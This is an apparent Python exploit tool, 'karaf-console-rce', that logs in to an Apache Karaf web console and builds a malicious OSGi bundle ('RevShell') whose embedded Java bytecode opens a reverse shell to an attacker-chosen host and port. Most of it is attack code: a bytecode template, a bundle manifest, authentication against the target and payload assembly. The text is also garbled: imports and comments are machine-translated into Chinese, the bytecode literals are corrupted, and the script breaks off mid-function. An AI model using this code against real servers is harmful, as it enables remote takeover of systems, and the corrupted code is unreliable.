# - lhost=192.168.0.100 -lport=4444 \
#-Creds=KARAF:KARAF
'''
该工具将使您从系统打开反向外壳
那是在运行karaf console',
'''
导入argparse
导入基础64
导入IO
导入
导入Zipfile
导入请求
#subtest.mf文件的内容。
subest_content=\
'Bundle-name: RevShell \ n'\
'Bundle-Description:捆绑包打开反向外壳连接。\ n'\
'bundle-symbolicName: com.visionspace.osgi.revshell.activator \ n'\
'Bundle-vendor: visionspace \ n'\
'Bundle-version: 1.0.0 \ n'\
'import-package: org.osgi.framework \ n'\
'Bundle-Activator: com.visionspace.osgi.revshell.activator'
#activator.class字节码模板。
activator_class_bytecode_template=\
B'\ XCA \ XFE \ XBA \ XBE \ X00 \ X00 \ X00 \ X00 \ X37 \ X00 \ X00 \ X7B'\
B'\ x0a \ x00 \ x22 \ x00 \ x33 \ x08 \ x00 \ x34 \ x34 \ x07 \ x00'\ x00'\ x00'\
B'\ x35 \ x07 \ x00 \ x36 \ x0a \ x00 \ x03 \ x00 \ x00 \ x37 \ x37 \ x0a'\
B'\ x00 \ x03 \ x00 \ x38 \ x0a \ x00 \ x03 \ x00 \ x00 \ x39 \ x07'\
B'\ x00 \ x3a \ x08 \ x00 \ x3b \ x08 \ x00 \ x3c \ x3c \ x0a \ x00'\ x00'\ x00
B'\ x3d \ x00 \ x3e \ x0a \ x00 \ x08 \ x00 \ x3f \ x3f \ x0a \ x00'\ x00'\ x00'\
B'\ x2c \ x00 \ x40 \ x0a \ x00 \ x2c \ x00 \ x41 \ x41 \ x0a \ x00'\ x00'\ x00'\
B'\ x08 \ x00 \ x40 \ x0a \ x00 \ x2c \ x00 \ x42 \ x42 \ x0a \ x00'\ x00'\
B'\ x08 \ x00 \ x42 \ x0a \ x00 \ x08 \ x00 \ x00 \ x43 \ x0a \ x0a \ x00'\ x00'\
B'\ x2d \ x00 \ x44 \ x0a \ x00 \ x2d \ x00 \ x45 \ x45 \ x0a \ x00'\ x00'\ x00'\
B'\ x2e \ x00 \ x46 \ x0a \ x00 \ x2e \ x00 \ x00 \ x47 \ x05 \ x00 \ x00'\ x00'\
B'\ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x32 \ x0a \ x0a \ x00 \ x00 \ x48'\
B'\ x00 \ x49 \ x0a \ x00 \ x2c \ x00 \ x4a \ x4a \ x07 \ x00 \ x00 \ x4b'\
B'\ x0a \ x00 \ x2c \ x00 \ x4c \ x0a \ x00 \ x00 \ x08 \ x00 \ x00 \ x4d'\
B'\ x09 \ x00 \ x4e \ x00 \ x4f \ x08 \ x00 \ x50 \ x50 \ x0a \ x00'\ x00'\ x00'\
B'\ x51 \ x00 \ x52 \ x07 \ x00 \ x53 \ x53 \ x07 \ x00 \ x54 \ x54 \ x07'\ x07'\
B'\ x00 \ x55 \ x01 \ x00 \ x06 \ x3c \ x69 \ x6e \ x6e \ x69 \ x74'\ x69 \ x69 \ x74'\
B'\ x3e \ x01 \ x00 \ x03 \ x28 \ x29 \ x56 \ x56 \ x01 \ x00 \ x00 \ x04'\
B'\ x43 \ x6f \ x64 \ x65 \ x01 \ x00 \ x0f \ x4c \ x4c \ x69 \ x6e'\
B'\ x65 \ x4e \ x75 \ x6d \ x62 \ x65 \ x72 \ x72 \ x54 \ x61 \ x62'\ x61 \ x62'\
B'\ x6c \ x65 \ x01 \ x00 \ x05 \ x73 \ x74 \ x61 \ x61 \ x72 \ x74'\ x74'\
B'\ x01 \ x00 \ x25 \ x28 \ x4c \ x6f \ x72 \ x67 \ x67 \ x2f \ x6f'\ x6f'\
B'\ x73 \ x67 \ x69 \ x2f \ x66 \ x72 \ x61 \ x6d \ x6d \ x65 \ x65 \ x77'\ x77'\
B'\ x6f \ x72 \ x6b \ x2f \ x42 \ x75 \ x6e \ x64 \ x64 \ x6c \ x65'\
B'\ x43 \ x6f \ x6e \ x74 \ x65 \ x78 \ x74 \ x74 \ x3b \ x29 \ x56'\ x56'\
B'\ x01 \ x00 \ x0d \ x53 \ x74 \ x61 \ x63 \ x6b \ x6b \ x4d \ x61'\
B'\ x70 \ x54 \ x61 \ x62 \ x6c \ x65 \ x65 \ x07 \ x00 \ x56 \ x56 \ x07'\ x07'\
B'\ x00 \ x57 \ x07 \ x00 \ x58 \ x58 \ x07 \ x00 \ x59 \ x59 \ x01 \ x00'\ x00'\ x00'\
B'\ x0a \ x45 \ x78 \ x63 \ x65 \ x70 \ x74 \ x74 \ x69 \ x6f \ x6e'\ x6e'\
B'\ x73 \ x01 \ x00 \ x04 \ x73 \ x74 \ x6f \ x70 \ x70 \ x01 \ x00'\ x00'\ x00
B'\ x0a \ x53 \ x6f \ x75 \ x72 \ x63 \ x65 \ x65 \ x46 \ x69 \ x6c'\ x6c'\
B'\ x65 \ x01 \ x00 \ x0e \ x41 \ x63 \ x74 \ x69 \ x76 \ x76 \ x61'\
B'\ x74 \ x6f \ x72 \ x2e \ x6a \ x61 \ x76 \ x61 \ x61 \ x0c \ x00'\ x00'\
B'\ x24 \ x00 \ x25 \ x01 \ x00 \ x02 \ x73 \ x68 \ x68 \ x01 \ x00'\ x00'\ x00
B'\ x18 \ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x61 \ x61 \ x61 \ x6e \ x67'\
B'\ x2f \ x50 \ x72 \ x6f \ x63 \ x65 \ x73 \ x73 \ x73 \ x42 \ x42 \ x75'\
B'\ x69 \ x6c \ x64 \ x65 \ x72 \ x01 \ x00 \ x00 \ x10 \ x6a \ x61 \ x61'\
B'\ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x53 \ x74'\ x74'\
B'\ x72 \ x69 \ x6e \ x67 \ x0c \ x00 \ x24 \ x00 \ x00 \ x5a \ x5a \ x0c'\
B'\ x00 \ x5b \ x00 \ x5c \ x0c \ x00 \ x28 \ x00 \ x00 \ x5d \ x5d \ x01'\
B'\ x00 \ x0f \ x6a \ x61 \ x76 \ x61 \ x2f \ x6e \ x65 \ x65 \ x74'\
B'\ x2f \ x53 \ x6f \ x63 \ x6b \ x65 \ x74 \ x01 \ x00 \ x00 \ x07'\
B'\ x3c \ x4c \ x48 \ x4f \ x53 \ x54 \ x3e \ x01 \ x01 \ x00 \ x07'\ x07'\
B'\ x3c \ x4c \ x50 \ x4f \ x52 \ x54 \ x3e \ x07 \ x00 \ x00 \ x5e'\ x5e'\
B'\ x0c \ x00 \ x5f \ x00 \ x60 \ x0c \ x00 \ x24 \ x24 \ x00 \ x00 \ x61'\
B'\ x0c \ x00 \ x62 \ x00 \ x63 \ x0c \ x00 \ x64 \ x64 \ x00 \ x63'\ x63'\
B'\ x0c \ x00 \ x65 \ x00 \ x66 \ x0c \ x00 \ x67 \ x67 \ x00 \ x00 \ x68'\
B'\ x0c \ x00 \ x69 \ x00 \ x6a \ x0c \ x00 \ x6b \ x6b \ x00 \ x6a'\ x6a'\
B'\ x0c \ x00 \ x6c \ x00 \ x6d \ x0c \ x00 \ x6e \ x6e \ x00 \ x00 \ x25'\
B'\ x07 \ x00 \ x6f \ x0c \ x00 \ x70 \ x00 \ x00 \ x71 \ x0c \ x0c \ x00'\ x00'\ x00
B'\ x72 \ x00 \ x6a \ x01 \ x00 \ x13 \ x6a \ x61 \ x61 \ x76 \ x61'\ x61'\
B'\ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x45 \ x78 \ x78 \ x63 \ x65'\
B'\ x70 \ x74 \ x69 \ x6f \ x6e \ x0c \ x00 \ x73 \ x00 \ x00 \ x25'\ x25'\
B'\ x0c \ x00 \ x74 \ x00 \ x25 \ x07 \ x00 \ x00 \ x75 \ x0c \ x00 \ x00'\ x00'\ x00
B'\ x76 \ x00 \ x77 \ x01 \ x00 \ x1d \ x54 \ x54 \ x68 \ x61 \ x61 \ x6e'\ x61
B'\ x6b \ x20 \ x79 \ x6f \ x75 \ x20 \ x66 \ x6f \ x6f \ x72 \ x20'\ x20'\
B'\ x70 \ x77 \ x6e \ x69 \ x6e \ x67 \ x20 \ x77 \ x77 \ x69 \ x74'\
B'\ x68 \ x20 \ x75 \ x73 \ x21 \ x07 \ x00 \ x00 \ x78 \ x0c \ x00'\ x00'\
B'\ x79 \ x00 \ x7a \ x01 \ x00 \ x27 \ x63 \ x6f \ x6f \ x6d \ x6d \ x2f'\
B'\ x76 \ x69 \ x73 \ x69 \ x6f \ x6e \ x73 \ x70 \ x70 \ x61 \ x63'\ x63'\
B'\ x65 \ x2f \ x6f \ x73 \ x67 \ x69 \ x2f \ x72 \ x65 \ x65 \ x76'\ x76'\
B'\ x73 \ x68 \ x65 \ x6c \ x6c \ x2f \ x41 \ x63 \ x63 \ x74 \ x69'\
B'\ x76 \ x61 \ x74 \ x6f \ x72 \ x01 \ x00 \ x00 \ x10 \ x6a \ x61'\ x61'\
B'\ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x4f \ x4f \ x62'\ x62'\ x62
B'\ x6a \ x65 \ x63 \ x74 \ x01 \ x00 \ x22 \ x6f \ x6f \ x72 \ x67'\ x67'\
B'\ x2f \ x6f \ x73 \ x67 \ x69 \ x2f \ x66 \ x72 \ x72 \ x61 \ x6d'\ x61
B'\ x65 \ x77 \ x6f \ x72 \ x6b \ x2f \ x42 \ x75 \ x75 \ x6e \ x64'\
B'\ x6c \ x65 \ x41 \ x63 \ x74 \ x69 \ x76 \ x61 \ x61 \ x74 \ x6f'\ x6f'\
B'\ x72 \ x01 \ x00 \ x20 \ x6f \ x72 \ x67 \ x2f \ x6f \ x6f \ x73'\ x73'\
B'\ x67 \ x69 \ x2f \ x66 \ x72 \ x61 \ x6d \ x65 \ x65 \ x77 \ x77 \ x6f'\ x6f'\
B'\ x72 \ x6b \ x2f \ x42 \ x75 \ x6e \ x64 \ x6c \ x6c \ x65 \ x43'\ x43'\
B'\ x6f \ x6e \ x74 \ x65 \ x78 \ x74 \ x01 \ x00 \ x00 \ x11 \ x6a'\ x6a'\
B'\ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x50'\ x50'\
B'\ x72 \ x6f \ x63 \ x65 \ x73 \ x73 \ x73 \ x01 \ x00 \ x13 \ x13 \ x6a'\
B'\ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x49 \ x6e \ x70'\ x70'\
B'\ x75 \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01 \ x00'\ x00'\ x00
B'\ x14 \ x6a \ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x6f \ x2f \ x2f \ x4f'\
B'\ x75 \ x74 \ x70 \ x75 \ x74 \ x53 \ x74 \ x72 \ x72 \ x65 \ x61'\ x61'\
B'\ x6d \ x01 \ x00 \ x16 \ x28 \ x5b \ x4c \ x6a \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x53 \ x74 \ x72'\ x74 \ x72'\
B'\ x69 \ x6e \ x67 \ x3b \ x29 \ x56 \ x01 \ x00 \ x00 \ x13 \ x72'\
B'\ x65 \ x64 \ x69 \ x72 \ x65 \ x63 \ x74 \ x45 \ x45 \ x72 \ x72'\ x72'\
B'\ x6f \ x72 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01 \ x00'\ x00'\
B'\ x1d \ x28 \ x5a \ x29 \ x4c \ x6a \ x61 \ x76 \ x76 \ x61 \ x2f'\ x2f'\
B'\ x6c \ x61 \ x6e \ x67 \ x2f \ x50 \ x72 \ x6f \ x6f \ x63 \ x65'\ x63 \ x65'\
B'\ x73 \ x73 \ x42 \ x75 \ x69 \ x6c \ x64 \ x65 \ x65 \ x72 \ x3b'\
B'\ x01 \ x00 \ x15 \ x28 \ x29 \ x4c \ x6a \ x61 \ x61 \ x76 \ x61'\ x61 \ x61'\
B'\ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x50 \ x72 \ x72 \ x6f \ x63'\ x63'\
B'\ x65 \ x73 \ x73 \ x3b \ x01 \ x00 \ x11 \ x6a \ x61 \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x49 \ x6e \ x6e \ x74'\ x74'\
B'\ x65 \ x67 \ x65 \ x72 \ x01 \ x00 \ x08 \ x70 \ x70 \ x61 \ x72'\ x72'\
B'\ x73 \ x65 \ x49 \ x6e \ x74 \ x01 \ x00 \ x15 \ x15 \ x28 \ x4c'\ x4c'\ x4c
B'\ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x61 \ x61 \ x6e \ x67 \ x67 \ x2f'\
B'\ x53 \ x74 \ x72 \ x69 \ x6e \ x67 \ x3b \ x3b \ x29 \ x49 \ x01'\ x01'\
B'\ x00 \ x16 \ x28 \ x4c \ x6a \ x61 \ x76 \ x61 \ x61 \ x2f \ x6c'\ x6c'\ x61
B'\ x61 \ x6e \ x67 \ x2f \ x53 \ x74 \ x72 \ x69 \ x69 \ x6e \ x67'\ x67'\
B'\ x3b \ x49 \ x29 \ x56 \ x01 \ x00 \ x0e \ x67 \ x67 \ x65 \ x74'\
B'\ x49 \ x6e \ x70 \ x75 \ x74 \ x53 \ x74 \ x72 \ x72 \ x65 \ x61'\ x61'\
B'\ x6d \ x01 \ x00 \ x17 \ x28 \ x29 \ x4c \ x6a \ x6a \ x61 \ x76'\
B'\ x61 \ x2f \ x69 \ x6f \ x2f \ x49 \ x6e \ x70 \ x70 \ x75 \ x74'\ x74'\
B'\ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x01 \ x00 \ x00 \ x0e'\ x0e'\
B'\ x67 \ x65 \ x74 \ x45 \ x72 \ x72 \ x6f \ x6f \ x72 \ x53 \ x74'\ x74'\
B'\ x72 \ x65 \ x61 \ x6d \ x01 \ x00 \ x00 \ x0f \ x67 \ x65 \ x65 \ x74'\
B'\ x4f \ x75 \ x74 \ x70 \ x75 \ x74 \ x53 \ x74 \ x74 \ x72 \ x65'\ x65'\
B'\ x61 \ x6d \ x01 \ x00 \ x18 \ x28 \ x29 \ x4c \ x4c \ x6a \ x61'\
B'\ x76 \ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x4f \ x75 \ x74 \ x74 \ x70'\ x70'\
B'\ x75 \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x3b \ x01'\ x01'\
B'\ x00 \ x08 \ x69 \ x73 \ x43 \ x6c \ x6f \ x6f \ x73 \ x65 \ x65 \ x64'\
B'\ x01 \ x00 \ x03 \ x28 \ x29 \ x5a \ x01 \ x00 \ x00 \ x09 \ x61'\
B'\ x76 \ x61 \ x69 \ x6c \ x61 \ x62 \ x6c \ x6c \ x65 \ x65 \ x01 \ x00'\ x00'\
B'\ x03 \ x28 \ x29 \ x49 \ x01 \ x00 \ x04 \ x72 \ x72 \ x65 \ x61'\ x65 \ x61'\
B'\ x64 \ x01 \ x00 \ x05 \ x77 \ x72 \ x69 \ x74 \ x74 \ x65 \ x01'\ x01'\
B'\ x00 \ x04 \ x28 \ x49 \ x29 \ x56 \ x01 \ x00 \ x00 \ x05 \ x05 \ x66'\
B'\ x6c \ x75 \ x73 \ x68 \ x01 \ x00 \ x10 \ x6a \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x54 \ x54 \ x68 \ x72'\ x72'\
B'\ x65 \ x61 \ x64 \ x01 \ x00 \ x05 \ x73 \ x6c \ x6c \ x65 \ x65'\ x65 \ x65'\
B'\ x70 \ x01 \ x00 \ x04 \ x28 \ x4a \ x29 \ x56 \ x56 \ x01 \ x00'\ x00'\ x00
B'\ x09 \ x65 \ x78 \ x69 \ x74 \ x56 \ x61 \ x6c \ x6c \ x75 \ x65'\ x65 \ x65'\
B'\ x01 \ x00 \ x07 \ x64 \ x65 \ x73 \ x74 \ x72 \ x72 \ x6f \ x79'\ x79'\
B'\ x01 \ x00 \ x05 \ x63 \ x6c \ x6f \ x6f \ x73 \ x65 \ x65 \ x01 \ x00'\ x00'\ x00
B'\ x10 \ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x6c \ x61 \ x61 \ x61 \ x6e \ x67'\ x67'\
B'\ x2f \ x53 \ x79 \ x73 \ x74 \ x65 \ x6d \ x6d \ x01 \ x00 \ x00 \ x03'\
B'\ x6f \ x75 \ x74 \ x01 \ x00 \ x15 \ x4c \ x4c \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x50 \ x72 \ x69 \ x6e \ x6e \ x74'\
B'\ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x01 \ x00 \ x00 \ x13'\
B'\ x6a \ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x6f \ x2f \ x50 \ x72'\ x72'\
B'\ x69 \ x6e \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01'\
B'\ x00 \ x07 \ x70 \ x72 \ x69 \ x6e \ x74 \ x6c \ x6c \ x6e \ x01'\
B'\ x00 \ x15 \ x28 \ x4c \ x6a \ x61 \ x76 \ x61 \ x61 \ x2f \ x6c'\ x6c'\ x61
B'\ x61 \ x6e \ x67 \ x2f \ x53 \ x74 \ x72 \ x69 \ x69 \ x6e \ x67'\ x67'\
B'\ x3b \ x29 \ x56 \ x00 \ x21 \ x00 \ x21 \ x00 \ x00 \ x21 \ x21 \ x00 \ x22 \ x00'\ x00'\ x00
B'\ x01 \ x00 \ x23 \ x00 \ x00 \ x00 \ x00 \ x03 \ x00 \ x01 \ x01 \ x00'\ x00'\ x00
B'\ x24 \ x00 \ x25 \ x00 \ x01 \ x00 \ x26 \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\
B'\ x1d \ x00 \ x01 \ x00 \ x01 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x05 \ x2a'\ x2a'\
B'\ xb7 \ x00 \ x01 \ xb1 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x27'\ x27'\
B'\ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0a'\
B'\ x00 \ x01 \ x00 \ x28 \ x00 \ x29 \ x00 \ x00 \ x02 \ x00 \ x00 \ x26'\
B'\ x00 \ x00 \ x01 \ x6e \ x00 \ x00 \ x06 \ x00 \ x0b \ x00 \ x00 \ x00'\ x00'\
B'\ x00 \ xb8 \ x12 \ x02 \ x4d \ xbb \ x00 \ x03 \ x59 \ x59 \ x04'\
B'\ xbd \ x00 \ x04 \ x59 \ x03 \ x2c \ x53 \ xb7 \ xb7 \ x00 \ x00 \ x05'\
B'\ x04 \ xb6 \ x00 \ x06 \ xb6 \ x00 \ x00 \ x07 \ x4e \ xbb \ xbb \ x00'\ x00'\
B'\ x08 \ x59 \ x12 \ x09 \ x12 \ x0a \ xb8 \ x00 \ x00 \ x0b \ xb7'\ xb7'\
B'\ x00 \ x0c \ x3a \ x04 \ x2d \ xb6 \ x00 \ x0d \ x0d \ x3a \ x05'\ x05'\
B'\ x2d \ xb6 \ x00 \ x0e \ x3a \ x06 \ x19 \ x04 \ x04 \ xb6 \ x00'\ x00'\
B'\ x0f \ x3a \ x07 \ x2d \ xb6 \ x00 \ x10 \ x3a \ x3a \ x08 \ x19'\ x19'\
B'\ x04 \ xb6 \ x00 \ x11 \ x3a \ x09 \ x19 \ x19 \ x04 \ xb6 \ x00'\ x00'\ x00'\
B'\ x12 \ x9a \ x00 \ x5f \ x19 \ x05 \ xb6 \ x00 \ x00 \ x13 \ x9e'\ x9e'\
B'\ x00 \ x10 \ x19 \ x09 \ x19 \ x05 \ xb6 \ x00 \ x00 \ x14 \ xb6'\ xb6'\
B'\ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x06 \ xb6 \ xb6 \ x00 \ x00 \ x13'\
B'\ X9E \ x00 \ x10 \ x19 \ x09 \ x19 \ x06 \ xb6 \ xb6 \ x00 \ x00 \ x14'\
B'\ xb6 \ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x07 \ xb6 \ xb6 \ x00'\ x00'\
B'\ x13 \ x9e \ x00 \ x10 \ x19 \ x08 \ x19 \ x07 \ xb6 \ xb6 \ x00'\ x00'\
B'\ x14 \ xb6 \ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x19 \ x09 \ xb6'\
B'\ x00 \ x16 \ x19 \ x08 \ xb6 \ x00 \ x16 \ x14 \ x14 \ x00 \ x00 \ x17'\ x17'\
B'\ xb8 \ x00 \ x19 \ x2d \ xb6 \ x00 \ x1a \ x57 \ x57 \ xa7 \ x00'\ x00'\
B'\ x08 \ x3a \ x0a \ xa7 \ xff \ x9f \ x2d \ xb6 \ xb6 \ x00 \ x1c'\ x1c'\
B'\ x19 \ x04 \ xb6 \ x00 \ x1d \ xb1 \ x00 \ x00 \ x01 \ x00 \ x00 \ xa1'\
B'\ x00 \ xa6 \ x00 \ xa9 \ x00 \ x1b \ x00 \ x02 \ x00 \ x00 \ x27'\ x27'\
B'\ x00 \ x00 \ x00 \ x66 \ x00 \ x19 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0c'\
B'\ x00 \ x03 \ x00 \ x0e \ x00 \ x1a \ x00 \ x00 \ x0f \ x00 \ x00 \ x2a'\ x2a'\
B'\ x00 \ x10 \ x00 \ x30 \ x00 \ x11 \ x00 \ x36 \ x36 \ x00 \ x12'\ x12'\
B'\ x00 \ x3d \ x00 \ x13 \ x00 \ x43 \ x00 \ x14 \ x14 \ x00 \ x4a'\ x4a'\
B'\ x00 \ x15 \ x00 \ x52 \ x00 \ x16 \ x00 \ x5a \ x5a \ x00 \ x17'\ x17'\
B'\ x00 \ x67 \ x00 \ x18 \ x00 \ x6f \ x00 \ x19 \ x19 \ x00 \ x7c'\ x7c'\
B'\ x00 \ x1a \ x00 \ x84 \ x00 \ x1b \ x00 \ x91 \ x91 \ x00 \ x1c'\ x1c'\
B'\ x00 \ x96 \ x00 \ x1d \ x00 \ x9b \ x00 \ x1e \ x1e \ x00 \ xa1'\
B'\ x00 \ x20 \ x00 \ xa6 \ x00 \ x21 \ x00 \ xa9 \ x00 \ x00 \ x22'\ x22'\
B'\ x00 \ xab \ x00 \ x23 \ x00 \ xae \ x00 \ x25 \ x25 \ x00 \ xb2'\
B'\ x00 \ x26 \ x00 \ xb7 \ x00 \ x27 \ x00 \ x00 \ x2a \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\
B'\ x00 \ x30 \ x00 \ x07 \ xff \ x00 \ x4a \ x00 \ x00 \ x0a \ x07'\
B'\ x00 \ x21 \ x07 \ x00 \ x2b \ x07 \ x00 \ x04 \ x04 \ x07 \ x00'\ x00'\ x00'\
B'\ x2c \ x07 \ x00 \ x08 \ x07 \ x00 \ x2d \ x2d \ x07 \ x00 \ x00 \ x2d'\ x2d'\
B'\ x07 \ x00 \ x2d \ x07 \ x00 \ x2e \ x2e \ x07 \ x00 \ x2e \ x2e \ x07 \ x00 \ x00 \ x2e \ x2e \ x00'\ x00'\
B'\ x00 \ x07 \ x14 \ x14 \ x14 \ x14 \ x14 \ x57 \ x07 \ x00 \ x00 \ x1b \ x1b \ x04'\
B'\ x00 \ x2f \ x00 \ x00 \ x00 \ x00 \ x04 \ x00 \ x01 \ x00 \ x00 \ x1b'\
B'\ x00 \ x01 \ x00 \ x30 \ x00 \ x29 \ x00 \ x02 \ x00 \ x00 \ x26'\ x00 \ x00 \ x26'\
B'\ x00 \ x00 \ x00 \ x25 \ x00 \ x00 \ x02 \ x00 \ x02 \ x00 \ x00 \ x02 \ x00 \ x00 \ x00'\ x00'\ x00
B'\ x00 \ x09 \ xb2 \ x00 \ x1e \ x12 \ x1f \ x1f \ xb6 \ x00 \ x20'\ x20'\
B'\ xb1 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x27 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\ x00'\
B'\ x0a \ x00 \ x02 \ x00 \ x00 \ x00 \ x00 \ x2a \ x00 \ x00 \ x00 \ x08 \ x00'\ x00'\ x00'\
B'\ x2b \ x00 \ x2f \ x00 \ x00 \ x00 \ x00 \ x04 \ x00 \ x01 \ x01 \ x00'\ x00'\
B'\ x1b \ x00 \ x01 \ x00 \ x31 \ x00 \ x00 \ x00 \ x00 \ x02 \ x00'\ x00'\ x00
B'\ x32'
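# Placeholders patched into the Activator.class bytecode by generate_payload().
# Each tag is "length byte + ASCII text" (presumably the low byte of the
# constant-pool UTF8 length followed by the string), so "<LHOST>" is
# 0x07 + 7 characters.  The replacement must keep that same shape, which is
# why generate_payload() limits lhost/lport to 255 bytes.
# len + "<LHOST>" = \x07\x3c\x4c\x48\x4f\x53\x54\x3e
activator_class_lhost_tag = b'\x07<LHOST>'
# len + "<LPORT>" = \x07\x3c\x4c\x50\x4f\x52\x54\x3e
activator_class_lport_tag = b'\x07<LPORT>'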
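def _port(value):
    """argparse type: an int in 1..65535.

    Rejects ports the console could not listen on / the reverse shell could
    never connect to, instead of letting them fail later inside the payload.
    """
    port = int(value)
    if not 1 <= port <= 65535:
        raise argparse.ArgumentTypeError(f'port out of range: {value}')
    return port


def parse(argv=None):
    """Parse the command-line arguments.

    Args:
        argv: optional argument list; ``None`` means ``sys.argv[1:]`` (the
            default keeps the original no-argument call working).

    Returns:
        argparse.Namespace with ``rhost``, ``rport``, ``lhost``, ``lport``
        and ``creds``.

    Raises:
        SystemExit: from argparse on missing/invalid arguments or ``--version``.
    """
    parser = argparse.ArgumentParser(
        prog='karaf-console-rce',
        description='This tool will give you a reverse shell from a '
                    'system that is running the Karaf console',
        epilog='Happy hacking! :)',
    )
    parser.add_argument('--rhost', dest='rhost', type=str, required=True,
                        help='remote host (Karaf web console address)')
    parser.add_argument('--rport', dest='rport', type=_port, required=True,
                        help='remote port (Karaf web console port)')
    parser.add_argument('--lhost', dest='lhost', type=str, required=True,
                        help='local host the reverse shell connects back to')
    parser.add_argument('--lport', dest='lport', type=_port, required=True,
                        help='local port the reverse shell connects back to')
    # dest must be 'creds': main() reads args.creds.
    parser.add_argument('--creds', dest='creds', type=str, required=True,
                        help='console credentials in the form username:password')
    parser.add_argument('--version', action='version',
                        version='%(prog)s 0.1.0')
    return parser.parse_args(argv)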
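def extract_jsessionid(cookie):
    """Extract the session id from a ``Set-Cookie`` header value.

    Args:
        cookie: the raw ``Set-Cookie`` header string (may be empty/None).

    Returns:
        The first ``JSESSIONID`` value found, or ``None`` if the header does
        not carry one.  The cookie name is matched case-insensitively so the
        lookup does not depend on the exact capitalisation the console uses.
    """
    if not cookie:
        return None
    match = re.search(r'JSESSIONID=([^;]+)', cookie, re.IGNORECASE)
    return match.group(1) if match else None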
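def authenticate(target, basic_auth):
    """Log in to the web console and obtain a session id.

    Performs a GET on ``target`` with the ``Authorization`` header and
    expects the console to answer with a redirect (302) that sets the
    session cookie.

    Args:
        target: console base URL (see create_target_url()).
        basic_auth: full ``Authorization`` header value
            (see generate_basic_auth()).

    Returns:
        The session id string, or ``None`` when the response is not a 302
        or carries no ``Set-Cookie`` header (e.g. wrong credentials).

    Raises:
        requests.RequestException: on connection errors or the 10 s timeout.
    """
    headers = {'Authorization': basic_auth}
    response = requests.get(target, headers=headers,
                            allow_redirects=False, timeout=10)
    if response.status_code != 302:
        return None
    # .get() rather than []: a 302 without Set-Cookie must yield None,
    # not a KeyError traceback.
    set_cookie = response.headers.get('Set-Cookie')
    if not set_cookie:
        return None
    return extract_jsessionid(set_cookie)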
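def _length_prefixed(value):
    """Return ``value`` preceded by its one-byte length.

    This is the shape of the ``<LHOST>``/``<LPORT>`` placeholders in the
    bytecode template (length byte followed by the text); a replacement
    that breaks it would leave the class file unparsable.

    Raises:
        ValueError: for an empty value or one longer than 255 bytes.
    """
    if not value or len(value) > 255:
        raise ValueError('value must be 1..255 bytes to fit a one-byte length')
    return bytes([len(value)]) + value


def _activator_entry_name(manifest):
    """Derive the JAR entry of the activator class from the manifest.

    Reads the ``Bundle-Activator`` header so the entry name cannot drift
    from the class the framework will try to load.

    Raises:
        ValueError: if the manifest has no ``Bundle-Activator`` header.
    """
    for line in manifest.splitlines():
        key, sep, value = line.partition(':')
        if sep and key.strip().lower() == 'bundle-activator':
            return value.strip().replace('.', '/') + '.class'
    raise ValueError('manifest has no Bundle-Activator header')


def generate_payload(lhost, lport):
    """Build the malicious OSGi bundle (a JAR) and return it as bytes.

    The Activator.class bytecode template carries ``<LHOST>``/``<LPORT>``
    as length-prefixed strings; they are replaced with the attacker's host
    and port, then the class is zipped together with its manifest.

    NOTE(review): the class name compiled into the bytecode template must
    agree with the manifest's Bundle-Activator header — not verifiable here.

    Args:
        lhost: host the reverse shell connects back to (ASCII, <= 255 bytes).
        lport: port the reverse shell connects back to (1-65535).

    Returns:
        The JAR as bytes, or ``None`` if a placeholder is missing from the
        template (replace() would otherwise silently ship a bundle that
        calls back to the literal string ``<LHOST>``).

    Raises:
        ValueError: if lhost is empty, too long or non-ASCII, or lport is
            out of range.
    """
    if not 1 <= int(lport) <= 65535:
        raise ValueError(f'lport out of range: {lport}')
    template = activator_class_bytecode_template
    if (activator_class_lhost_tag not in template
            or activator_class_lport_tag not in template):
        return None
    # encode('ascii') raises UnicodeEncodeError (a ValueError) for hosts the
    # one-byte-per-char placeholder cannot carry.
    lhost_bytes = _length_prefixed(str(lhost).encode('ascii'))
    lport_bytes = _length_prefixed(str(int(lport)).encode('ascii'))
    activator = template.replace(activator_class_lhost_tag, lhost_bytes)
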